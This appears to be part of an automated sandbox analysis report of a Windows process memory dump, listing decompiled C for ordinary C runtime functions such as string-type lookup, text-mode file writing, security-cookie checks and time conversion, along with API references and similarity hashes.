0x00ea0eba
0x00ea0ec0
0x00ea0ec4
0x00ea0ec6
0x00ea0ec8
0x00ea0ecf
0x00000000
0x00000000
0x00ea0ecf
0x00ea0edc
0x00ea0edf
0x00ea0ee2
0x00ea0efb
0x00ea0efd
0x00ea0f01
0x00ea0f42
0x00ea0f45
0x00000000
0x00ea0f03
0x00ea0f03
0x00ea0f0c
0x00ea0f11
0x00ea0f16
0x00000000
0x00000000
0x00ea0f18
0x00ea0f1b
0x00ea0f20
0x00ea0f23
0x00ea0f23
0x00ea0f25
0x00ea0f26
0x00ea0f2a
0x00ea0f2d
0x00ea0f30
0x00ea0f32
0x00ea0f35
0x00ea0f38
0x00ea0f39
0x00ea0f3d
0x00000000
0x00ea0f3f
0x00ea0f3f
0x00000000
0x00ea0f3f
0x00000000
0x00ea0f3d
0x00ea0f5c
0x00ea0f5d
0x00ea0f5e
0x00ea0f5f
0x00ea0f60
0x00ea0f61
0x00ea0f66
0x00ea0f6a
0x00ea0f6c
0x00ea0f6f
0x00ea0f76
0x00ea0f79
0x00ea0f7c
0x00ea0f7d
0x00ea0f80
0x00ea0f83
0x00ea0f86
0x00ea0f8b
0x00ea0f94
0x00ea0f9f
0x00ea0fa9
0x00ea0fb0
0x00ea0fb6
0x00ea0fba
0x00ea0fbf
0x00ea0fc4
0x00ea0fdb
0x00ea0fe0
0x00ea0ff6
0x00ea0fe2
0x00ea0fe2
0x00ea0fe5
0x00ea0fe5
0x00ea0fe7
0x00ea0fe8
0x00ea0ff1
0x00ea0ff1
0x00ea0ffd
0x00ea0fff
0x00ea1000
0x00ea1003
0x00ea1004
0x00ea1009
0x00ea100b
0x00ea100d
0x00ea100d
0x00ea1010
0x00ea1010
0x00ea1012
0x00ea1013
0x00ea1019
0x00ea101d
0x00ea101f
0x00ea1021
0x00ea1025
0x00ea1025
0x00ea102d
0x00ea1031
0x00ea103e
0x00ea1040
0x00ea1043
0x00ea1045
0x00ea1045
0x00ea1047
0x00ea104a
0x00ea104a
0x00ea104c
0x00ea104d
0x00ea1054
0x00ea1056
0x00ea105b
0x00ea105b
0x00ea1061
0x00ea1063
0x00ea1065
0x00ea1077
0x00ea107d
0x00ea1080
0x00ea1080
0x00ea1082
0x00ea1083
0x00ea108d
0x00ea1092
0x00000000
0x00000000
0x00000000
0x00ea1092
0x00ea1065
0x00ea1094
0x00ea1094
0x00ea1096
0x00ea1099
0x00ea109b
0x00ea10cc
0x00ea10a0
0x00ea10a0
0x00ea10a3
0x00ea10a6
0x00ea10a6
0x00ea10a8
0x00ea10a9
0x00ea10af
0x00ea10b5
0x00ea10ba
0x00ea10bf
0x00ea1108
0x00ea110c
0x00ea10c1
0x00ea10c4
0x00ea10c7
0x00ea10ca
0x00000000
0x00ea10ca
0x00ea10db
0x00ea10de
0x00ea10e6
0x00ea10ec
0x00ea1110
0x00ea1113
0x00ea1117
0x00ea1136
0x00ea1119
0x00ea111e
0x00ea1123
0x00ea1126
0x00ea112c
0x00ea112e
0x00ea1131
0x00ea1131
0x00ea113c
0x00ea117d
0x00ea1143
0x00ea1148
0x00ea114d
0x00000000
0x00ea1153
0x00ea1153
0x00ea1156
0x00ea115b
0x00ea115e
0x00ea115e
0x00ea1160
0x00ea1161
0x00ea1168
0x00ea116e
0x00ea1170
0x00ea1172
0x00ea1175
0x00ea1178
0x00ea117b
0x00000000
0x00ea117b
0x00000000
0x00ea114d
0x00ea1184
0x00ea11ca
0x00ea11cc
0x00ea11ce
0x00ea11d1
0x00ea11d1
0x00ea11d5
0x00ea11d8
0x00ea11da
0x00000000
0x00ea1186
0x00ea118e
0x00ea1193
0x00ea1198
0x00000000
0x00ea119a
0x00ea11a3
0x00ea11a8
0x00ea11ad
0x00000000
0x00ea11af
0x00ea11b2
0x00ea11c7
0x00ea11c7
0x00000000
0x00ea11b4
0x00ea11bb
0x00ea11c0
0x00ea11c5
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea11c5
0x00ea11b2
0x00ea11ad
0x00ea1198
0x00ea10ee
0x00ea10f0
0x00ea10f6
0x00ea10fd
0x00ea10fe
0x00ea11dc
0x00ea11de
0x00000000
0x00ea11e3
0x00000000
0x00ea10ec
0x00ea10d5
0x00ea10d8
0x00000000
0x00ea1033
0x00ea1035
0x00ea11e4
0x00ea11e5
0x00000000
0x00ea11ec
0x00ea0fc6
0x00ea0fc9
0x00ea1207
0x00ea1207
0x00ea1209
0x00ea120b
0x00ea120d
0x00ea120f
0x00ea1211
0x00ea1216
0x00ea1219
0x00ea121c
0x00ea121d
0x00ea121e
0x00ea1222
0x00ea1228
0x00ea1234
0x00ea1243
0x00ea1246
0x00ea1249
0x00ea124a
0x00ea124d
0x00ea1256
0x00ea1274
0x00ea127c
0x00ea127e
0x00ea1284
0x00ea1258
0x00ea125b
0x00ea1263
0x00ea1268
0x00ea1268
0x00ea1236
0x00ea1239
0x00ea123e
0x00ea123e
0x00ea1291
0x00ea0fcf
0x00ea0fd4
0x00ea11ed
0x00ea11f0
0x00000000
0x00ea11f6
0x00ea0fc9
0x00ea0f8d
0x00ea11f8
0x00ea1206
0x00ea1206
0x00ea0f8b
0x00ea0ee4
0x00ea0ee6
0x00ea0eec
0x00ea0ef1
0x00ea0ef3
0x00ea0ef4
0x00ea0f49
0x00ea0f4b
0x00ea0f59
0x00ea0f59
0x00000000

APIs

__dosmaperr.LIBCMT ref: 00EA0EE6
_free.LIBCMT ref: 00EA0F4B

Strings

SystemRoot, xrefs: 00EA1186, 00EA1189

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: __dosmaperr_free
String ID: SystemRoot
API String ID: 3116789124-2034820756
Opcode ID: 838da5feab997975f204f6d835d1eace530b1c7f0a4539c02cfd82e100e854da
Instruction ID: 6d2d3ae89fc07fa5799bcfa601a3005eefefd84ae8dd458904315aa030520034
Opcode Fuzzy Hash: 838da5feab997975f204f6d835d1eace530b1c7f0a4539c02cfd82e100e854da
Instruction Fuzzy Hash: 9421B476705205AFEF14DE68C890BA9B7E8EF4B728F2491AEF844EB341D671AD018750

Uniqueness

Uniqueness Score: -1.00%

Function 00E9BFC9, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E9BFC9(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				void* _v44;
				signed int _t30;
				signed int _t36;
				signed int _t40;
				int _t43;
				intOrPtr _t55;
				int _t57;
				short* _t59;
				signed int _t60;
				void* _t61;
				short* _t62;

				_t30 =  *0xea9014; // 0xa413846
				_v8 = _t30 ^ _t60;
				E00E919CE( &_v32, _a4);
				_t48 = _a24;
				if(_a24 == 0) {
					_t48 =  *((intOrPtr*)(_v28 + 8));
				}
				_t57 = 0;
				_t36 = E00E9A8F9(_t48, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_t62 = _t61 + 0x18;
				_v16 = _t36;
				if(_t36 == 0) {
					L16:
					if(_v20 != 0) {
						 *(_v32 + 0x350) =  *(_v32 + 0x350) & 0xfffffffd;
					}
					return E00E8AE43(_v8 ^ _t60);
				} else {
					_t55 = _t36 + _t36;
					_v12 = _t55;
					asm("sbb eax, eax");
					_t40 = _t36 & _t55 + 0x00000008;
					if(_t40 == 0) {
						_t59 = 0;
						L12:
						if(_t59 != 0) {
							E00E8D0F0(_t57, _t59, _t57, _t55);
							_t43 = E00E9A8F9(_t48, 1, _a12, _a16, _t59, _v16);
							if(_t43 != 0) {
								_t57 = GetStringTypeW(_a8, _t59, _t43, _a20);
							}
						}
						E00E8C920(_t59);
						goto L16;
					}
					if(_t40 > 0x400) {
						_t59 = E00E96F1C(_t40);
						if(_t59 == 0) {
							L10:
							_t55 = _v12;
							goto L12;
						}
						 *_t59 = 0xdddd;
						L9:
						_t59 =  &(_t59[4]);
						goto L10;
					}
					E00EA4C00();
					_t59 = _t62;
					if(_t59 == 0) {
						goto L10;
					}
					 *_t59 = 0xcccc;
					goto L9;
				}
			}

0x00e9bfd1
0x00e9bfd8
0x00e9bfe4
0x00e9bfe9
0x00e9bfee
0x00e9bff3
0x00e9bff3
0x00e9bff8
0x00e9c011
0x00e9c016
0x00e9c019
0x00e9c01e
0x00e9c0a8
0x00e9c0ac
0x00e9c0b1
0x00e9c0b1
0x00e9c0cd
0x00e9c024
0x00e9c024
0x00e9c02a
0x00e9c02f
0x00e9c031
0x00e9c033
0x00e9c06a
0x00e9c06c
0x00e9c06e
0x00e9c073
0x00e9c085
0x00e9c08f
0x00e9c09f
0x00e9c09f
0x00e9c08f
0x00e9c0a2
0x00000000
0x00e9c0a7
0x00e9c03a
0x00e9c055
0x00e9c05a
0x00e9c065
0x00e9c065
0x00000000
0x00e9c065
0x00e9c05c
0x00e9c062
0x00e9c062
0x00000000
0x00e9c062
0x00e9c03c
0x00e9c041
0x00e9c045
0x00000000
0x00000000
0x00e9c047
0x00000000
0x00e9c047

APIs

GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 00E9C099
__freea.LIBCMT ref: 00E9C0A2

Part of subcall function 00E96F1C: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00E9084B,00000002,?,?,?,00E824A9,00000000,0000002C,00E825BB), ref: 00E96F4E

Strings

F8A/, xrefs: 00E9BFD1

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapStringType__freea
String ID: F8A/
API String ID: 4073780324-73971870
Opcode ID: a67290f8b0afe5ff63ae016a35967c034381b68075f92fbbe8f4dd53f535b64c
Instruction ID: f563fec260311b82ff377860a9ae4f7ce1b89b9999153537f172e5651660e020
Opcode Fuzzy Hash: a67290f8b0afe5ff63ae016a35967c034381b68075f92fbbe8f4dd53f535b64c
Instruction Fuzzy Hash: EF31CF7190020AEBDF20AF65DC45EAF7BA8EF44710F295268F808B7251DB318D51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EA281C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00EA281C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v10;
				void _v5128;
				void* _v5132;
				long _v5136;
				intOrPtr _v5140;
				signed int _t28;
				long _t42;
				signed int _t43;
				intOrPtr* _t46;
				signed short* _t51;
				intOrPtr _t55;
				signed int _t60;
				signed int* _t62;
				long _t64;
				signed int _t66;

				E00EA4F80();
				_t28 =  *0xea9014; // 0xa413846
				_v8 = _t28 ^ _t66;
				_t48 = _a8;
				_t46 = _a4;
				_t51 = _a12;
				_t55 = _a16 + _t51;
				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0xeaa6c8 + (_a8 >> 6) * 4)) + 0x18 + (_t48 & 0x0000003f) * 0x38));
				asm("stosd");
				_v5140 = _t55;
				asm("stosd");
				asm("stosd");
				while(_t51 < _t55) {
					_t62 =  &_v5128;
					while(_t51 < _t55) {
						_t43 =  *_t51 & 0x0000ffff;
						_t51 =  &(_t51[1]);
						if(_t43 == 0xa) {
							 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 2;
							_t60 = 0xd;
							 *_t62 = _t60;
							_t62 =  &(_t62[0]);
						}
						 *_t62 = _t43;
						_t62 =  &(_t62[0]);
						if(_t62 <  &_v10) {
							continue;
						}
						break;
					}
					_a12 = _t51;
					_t64 = _t62 -  &_v5128 & 0xfffffffe;
					if(WriteFile(_v5132,  &_v5128, _t64,  &_v5136, 0) == 0) {
						 *_t46 = GetLastError();
					} else {
						_t42 = _v5136;
						 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t42;
						if(_t42 >= _t64) {
							_t51 = _a12;
							_t55 = _v5140;
							continue;
						}
					}
					L12:
					return E00E8AE43(_v8 ^ _t66);
				}
				goto L12;
			}

0x00ea2826
0x00ea282b
0x00ea2832
0x00ea2835
0x00ea2847
0x00ea2859
0x00ea285c
0x00ea285e
0x00ea2866
0x00ea2867
0x00ea286d
0x00ea286e
0x00ea28e6
0x00ea2871
0x00ea2877
0x00ea287b
0x00ea287e
0x00ea2884
0x00ea2886
0x00ea288c
0x00ea288d
0x00ea2890
0x00ea2890
0x00ea2893
0x00ea2896
0x00ea289e
0x00000000
0x00000000
0x00000000
0x00ea289e
0x00ea28ae
0x00ea28b9
0x00ea28ce
0x00ea28f2
0x00ea28d0
0x00ea28d0
0x00ea28d6
0x00ea28db
0x00ea28dd
0x00ea28e0
0x00000000
0x00ea28e0
0x00ea28db
0x00ea28f4
0x00ea2906
0x00ea2906
0x00000000

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,8304488B,00E913E1,00000000,?,00EA2C38,00000010,00E913E1,00000000,?,?,00E913E1), ref: 00EA28C6
GetLastError.KERNEL32(?,00EA2C38,00000010,00E913E1,00000000,?,?,00E913E1,00E913E1,00000010,00E98E85,00000000,8304488B,?,?,?), ref: 00EA28EC

Strings

F8A/, xrefs: 00EA282B

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: F8A/
API String ID: 442123175-73971870
Opcode ID: 461109c448724adabe9c33b11e39170fd2d3a67d0f05711008c8f69a14827405
Instruction ID: d39dc852b0a7032541dff736e2e7fdbeddb5046d64e1d08c957cc425fe5b4805
Opcode Fuzzy Hash: 461109c448724adabe9c33b11e39170fd2d3a67d0f05711008c8f69a14827405
Instruction Fuzzy Hash: 38315031A012199FCB18CF1DDC819A9B3B9EF4D314B1445AAFA09FB250D730ED85CA95

Uniqueness

Uniqueness Score: -1.00%

Function 00EA273F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00EA273F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				void _v5128;
				long _v5132;
				intOrPtr _v5136;
				signed int _t28;
				long _t42;
				char _t43;
				intOrPtr* _t46;
				intOrPtr* _t51;
				intOrPtr _t55;
				void* _t59;
				char* _t62;
				long _t63;
				signed int _t64;

				E00EA4F80();
				_t28 =  *0xea9014; // 0xa413846
				_v8 = _t28 ^ _t64;
				_t48 = _a8;
				_t46 = _a4;
				_t51 = _a12;
				_t55 = _a16 + _t51;
				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0xeaa6c8 + (_a8 >> 6) * 4)) + 0x18 + (_t48 & 0x0000003f) * 0x38));
				asm("stosd");
				_v5136 = _t55;
				asm("stosd");
				asm("stosd");
				if(_t51 < _t55) {
					_t59 = _v5132;
					do {
						_t62 =  &_v5128;
						while(_t51 < _t55) {
							_t43 =  *_t51;
							_t51 = _t51 + 1;
							if(_t43 == 0xa) {
								 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 1;
								 *_t62 = 0xd;
								_t62 = _t62 + 1;
							}
							 *_t62 = _t43;
							_t62 = _t62 + 1;
							if(_t62 <  &_v9) {
								continue;
							}
							break;
						}
						_a12 = _t51;
						_t63 = _t62 -  &_v5128;
						if(WriteFile(_t59,  &_v5128, _t63,  &_v5132, 0) == 0) {
							 *_t46 = GetLastError();
						} else {
							_t42 = _v5132;
							 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t42;
							if(_t42 >= _t63) {
								goto L9;
							}
						}
						goto L12;
						L9:
						_t51 = _a12;
						_t55 = _v5136;
					} while (_t51 < _t55);
				}
				L12:
				return E00E8AE43(_v8 ^ _t64);
			}

0x00ea2749
0x00ea274e
0x00ea2755
0x00ea2758
0x00ea276a
0x00ea277c
0x00ea277f
0x00ea2781
0x00ea2789
0x00ea278a
0x00ea2790
0x00ea2791
0x00ea2794
0x00ea2796
0x00ea279c
0x00ea279c
0x00ea27a2
0x00ea27a6
0x00ea27a8
0x00ea27ab
0x00ea27ad
0x00ea27b0
0x00ea27b3
0x00ea27b3
0x00ea27b4
0x00ea27b6
0x00ea27bc
0x00000000
0x00000000
0x00000000
0x00ea27bc
0x00ea27c4
0x00ea27c7
0x00ea27e3
0x00ea2807
0x00ea27e5
0x00ea27e5
0x00ea27eb
0x00ea27f0
0x00000000
0x00000000
0x00ea27f0
0x00000000
0x00ea27f2
0x00ea27f2
0x00ea27f5
0x00ea27fb
0x00ea27ff
0x00ea2809
0x00ea281b

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,8304488B,00E913E1,00000000,?,00EA2C58,00000010,00E913E1,00000000,?,?,00E913E1), ref: 00EA27DB
GetLastError.KERNEL32(?,00EA2C58,00000010,00E913E1,00000000,?,?,00E913E1,00E913E1,00000010,00E98E85,00000000,8304488B,?,?,?), ref: 00EA2801

Strings

F8A/, xrefs: 00EA274E

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: F8A/
API String ID: 442123175-73971870
Opcode ID: 86367e227f2c941708858b91c7ea56502ed01341ddc2f3552a28ebfc637240eb
Instruction ID: 866bd3daeb90ca5258c00d6b393cec9998df1ad5b57bec6c5925f8c93d6dcda1
Opcode Fuzzy Hash: 86367e227f2c941708858b91c7ea56502ed01341ddc2f3552a28ebfc637240eb
Instruction Fuzzy Hash: 16218535A002199FCB19CF19DD809E9B7B9EB4D301F1440AEEA06FB211D630AE46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E95EC9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E95EC9(char* _a4, intOrPtr _a8, char _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t22;
				char _t24;
				short _t32;
				intOrPtr _t33;
				char* _t34;
				intOrPtr _t35;

				_t34 = _a4;
				if(_t34 == 0) {
					_t35 = _a8;
					E00E95F9A(_t35);
					_t32 = 0;
					 *((intOrPtr*)(_t35 + 8)) = 0;
					 *((intOrPtr*)(_t35 + 0xc)) = 0;
					L2:
					 *((intOrPtr*)(_t35 + 0x10)) = _t32;
					L13:
					return 0;
				}
				_t32 = 0;
				__eflags =  *_t34;
				if( *_t34 != 0) {
					_t9 =  &_a16; // 0xe96eeb
					_t16 = E00E9A8F9( *_t9, 9, _t34, 0xffffffff, 0, 0);
					__eflags = _t16;
					if(_t16 == 0) {
						L8:
						E00E95B87(GetLastError());
						return  *((intOrPtr*)(E00E95BBD()));
					}
					_t33 = _a8;
					__eflags = _t16 -  *((intOrPtr*)(_t33 + 0xc));
					if(__eflags <= 0) {
						L11:
						_t17 = E00E9A8F9(_a16, 9, _t34, 0xffffffff,  *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)));
						__eflags = _t17;
						if(_t17 == 0) {
							goto L8;
						}
						_t22 = _t17 - 1;
						__eflags = _t22;
						 *((intOrPtr*)(_t33 + 0x10)) = _t22;
						goto L13;
					}
					_t24 = E00E95FDB(_t33, __eflags, _t16);
					__eflags = _t24;
					if(_t24 == 0) {
						goto L11;
					}
				} else {
					_t35 = _a8;
					__eflags =  *((intOrPtr*)(_t35 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((short*)( *((intOrPtr*)(_t35 + 8)))) = 0;
						goto L2;
					}
					_t24 = E00E95FDB(_t35, __eflags, 1);
					__eflags = _t24;
					if(_t24 == 0) {
						goto L6;
					}
				}
				return _t24;
			}

0x00e95ecf
0x00e95ed5
0x00e95ed7
0x00e95edc
0x00e95ee1
0x00e95ee3
0x00e95ee6
0x00e95ee9
0x00e95ee9
0x00e95f75
0x00000000
0x00e95f75
0x00e95ef1
0x00e95ef3
0x00e95ef6
0x00e95f1e
0x00e95f21
0x00e95f29
0x00e95f2b
0x00e95f2d
0x00e95f34
0x00000000
0x00e95f3f
0x00e95f43
0x00e95f46
0x00e95f49
0x00e95f57
0x00e95f65
0x00e95f6d
0x00e95f6f
0x00000000
0x00000000
0x00e95f71
0x00e95f71
0x00e95f72
0x00000000
0x00e95f72
0x00e95f4e
0x00e95f53
0x00e95f55
0x00000000
0x00000000
0x00e95ef8
0x00e95ef8
0x00e95efb
0x00e95efe
0x00e95f0d
0x00e95f12
0x00000000
0x00e95f12
0x00e95f04
0x00e95f09
0x00e95f0b
0x00000000
0x00000000
0x00e95f0b
0x00e95f7a

APIs

Part of subcall function 00E95F9A: _free.LIBCMT ref: 00E95FA8

Part of subcall function 00E9A8F9: MultiByteToWideChar.KERNEL32(00E9A729,00000100,E8458D00,00000000,00000000,00000020,?,00E9C016,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 00E9A969

GetLastError.KERNEL32(?,?,?,?,?,?,?,00E96EEB,00000000,?,00000000,00000000,?,?,?,00E908CC), ref: 00E95F2D
__dosmaperr.LIBCMT ref: 00E95F34

Strings

n, xrefs: 00E95F1E

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr_free
String ID: n
API String ID: 4030486722-3297054318
Opcode ID: a7393370baadde6df9b5c675ead1cce5d59ff324f333b19f740b403fac01abf7
Instruction ID: 5a73583f2f43a5004ef476fc9a379de83288245af2bf5f52a7dcbf5e30b6dd6d
Opcode Fuzzy Hash: a7393370baadde6df9b5c675ead1cce5d59ff324f333b19f740b403fac01abf7
Instruction Fuzzy Hash: 69219073704A05ABDF229F268C01E6AB7E5AF81374F109519F868F7690E771E8418BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00E8AE43, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00E8AE43(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				asm("repne jnz 0x5");
				asm("repne ret");
				asm("repne jmp 0x33");
				_v8 = 0;
				_t5 = E00E964B8(_a4); // executed
				return _t5;
			}

0x00e8ae49
0x00e8ae4c
0x00e8ae4e
0x00e9098e
0x00e90998
0x00e909a1

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E8AE8C
___raise_securityfailure.LIBCMT ref: 00E8AF73

Strings

F8A/, xrefs: 00E8AF54

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: F8A/
API String ID: 3761405300-73971870
Opcode ID: 20503b93316ce5f1352ead06225f3e475e5f48b1561bb3a656c2814f26ca3faf
Instruction ID: 99c3b61c0da9496a9fa3b2b876a19aa76f1449689dd1faf17e606941bba32198
Opcode Fuzzy Hash: 20503b93316ce5f1352ead06225f3e475e5f48b1561bb3a656c2814f26ca3faf
Instruction Fuzzy Hash: 4C21D3B5550300DEDB10DF1AED816817BE4BB4E314F24942AE909AB3A3E3F56989CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00E9D965, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00E9D965(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0xeaa938 + _a4 * 4;
				_t28 =  *0xea9014; // 0xa413846
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E00E9D89C(_t22, _a12, _a16);
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0xea9014;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E00E8B0BF(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}

0x00e9d96f
0x00e9d979
0x00e9d97f
0x00e9d984
0x00e9d986
0x00e9d989
0x00e9d98d
0x00e9d995
0x00e9d9a2
0x00e9d9ab
0x00e9d9ca
0x00e9d9cf
0x00e9d9d7
0x00e9d9df
0x00e9d9e1
0x00e9d9e3
0x00000000
0x00e9d9e3
0x00e9d9b7
0x00e9d9bb
0x00000000
0x00000000
0x00e9d9c4
0x00e9d9c6
0x00000000
0x00e9d9c6
0x00000000
0x00e9d997
0x00000000

Strings

F8A/, xrefs: 00E9D979, 00E9D9CA

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: F8A/
API String ID: 0-73971870
Opcode ID: 1dddf58d0f0d45fbf1f4c822fa6df2b34b9b4aad4590bc4eee33487320dbb31c
Instruction ID: 53cafd4f6a079a24c4061d4a8cec7dc1f36e23e498240e953ff17b0281cae7f2
Opcode Fuzzy Hash: 1dddf58d0f0d45fbf1f4c822fa6df2b34b9b4aad4590bc4eee33487320dbb31c
Instruction Fuzzy Hash: CF0128337082215FDF25AE6EEC81A5B33DAABCA3643249121FA09FB155DA70D801D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A7BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00E8A7BF(void* __eflags) {
				signed int _v8;
				void* _v10;
				struct _SYSTEMTIME _v24;
				struct _FILETIME _v32;
				signed int _t9;
				signed int _t27;

				_t9 =  *0xea9014; // 0xa413846
				_v8 = _t9 ^ _t27;
				GetSystemTime( &_v24);
				SystemTimeToFileTime( &_v24,  &_v32);
				asm("adc eax, 0x0");
				asm("adc eax, 0xfe624e21");
				E00EA4C70(0 + _v32.dwLowDateTime + 0x2ac18000, _v32.dwHighDateTime, 0x989680, 0);
				return E00E8AE43(_v8 ^ _t27);
			}

0x00e8a7c5
0x00e8a7cc
0x00e8a7d3
0x00e8a7e1
0x00e8a7f1
0x00e8a7ff
0x00e8a806
0x00e8a828

APIs

GetSystemTime.KERNEL32(?,?,?,?,00E82EFB), ref: 00E8A7D3
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00E82EFB), ref: 00E8A7E1

Strings

F8A/, xrefs: 00E8A7C5

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
